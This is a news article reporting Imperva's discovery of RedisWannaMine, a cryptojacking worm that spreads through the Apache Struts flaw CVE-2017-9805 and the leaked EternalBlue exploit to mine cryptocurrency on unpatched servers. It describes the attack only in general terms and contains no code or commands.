Cryptojacking attack uses leaked EternalBlue NSA exploit to infect servers

RedisWannaMine is a sophisticated attack which targets servers to fraudulently mine cryptocurrency.
Written by Charlie Osborne, Contributing Writer

Researchers have uncovered a new cryptojacking scheme which utilizes the leaked NSA exploit EternalBlue to infect vulnerable Windows servers.

On Thursday, security professionals from Imperva revealed the attack, warning that this latest scheme is far more sophisticated than most recorded cryptojacking attempts, which are generally rather simple in nature.

The new attack, called RedisWannaMine, targets servers to mine cryptocurrency and "demonstrates a worm-like behavior combined with advanced exploits to increase the attackers' infection rate and fatten their [operator] wallets."

When a target server has been identified, the malware exploits CVE-2017-9805, an Apache Struts vulnerability which impacts the Struts REST plugin with XStream handler.

If exploited, the security flaw allows attackers to remotely execute code without authentication on an application server.

This vulnerability is used by the attackers to run a shell command which downloads cryptocurrency mining malware.

However, the downloader used is more sophisticated than usual, as it also gains persistency through new server entries in crontab, and gains remote access to a victim machine through new SSH key entries in the authorized keys sector, as well as the system's iptables.

Other packages are also downloaded using standard Linux package managers, and one particular GitHub tool, a TCP port scanner called masscan, is also included in the payload.

The attack script then launches a process called redisscan, which utilizes masscan to discover and infect vulnerable Redis servers. A process which follows is called ebscan, and this process uses masscan for a different purpose -- to discover and infect publicly-available Windows servers that are vulnerable to EternalBlue.

EternalBlue is an exploit developed by the US National Security Agency (NSA), leaked by the Shadow Brokers threat group in 2017.

The now infamous exploit was used to conduct the WannaCry ransomware campaign which crippled organizations worldwide last year and has been added to many a threat actor's toolboxes ever since.

If the exploit successfully compromises a server, the attack script drops the admissioninit.exe payload, which is a cryptocurrency mining script that will mine virtual coins and deposit the funds in a wallet controlled by the attackers.

While Imperva has not revealed the scope of the attack or how many vulnerable systems may have been exploited, the attack highlights one thing -- if IT admins do not patch themselves against such well-known exploits, cyberattackers will take advantage of this security failure to line their own pockets.

See also: Ad network circumvents blockers to hijack browsers for cryptocurrency mining

Earlier this month, researchers discovered an advertising network which was able to circumvent ad-blockers to serve website visitors cryptojacking scripts.

How Blockchain technologies are transforming our societies

Previous and related coverage

    Tesla cloud systems exploited by hackers to mine cryptocurrency

    Updated: Researchers have discovered that Tesla's AWS cloud systems were compromised for the purpose of cryptojacking.

    UK government websites, ICO hijacked by cryptocurrency mining malware

    US and Australian government domains were also affected by the bold cryptojacking scheme.

    TechRepublic: Hackers can now hide cryptojacking scripts in Microsoft Word documents

    Scripts hidden in Word's Online Video feature are being used to mine the Monero cryptocurrency.

      Editorial standards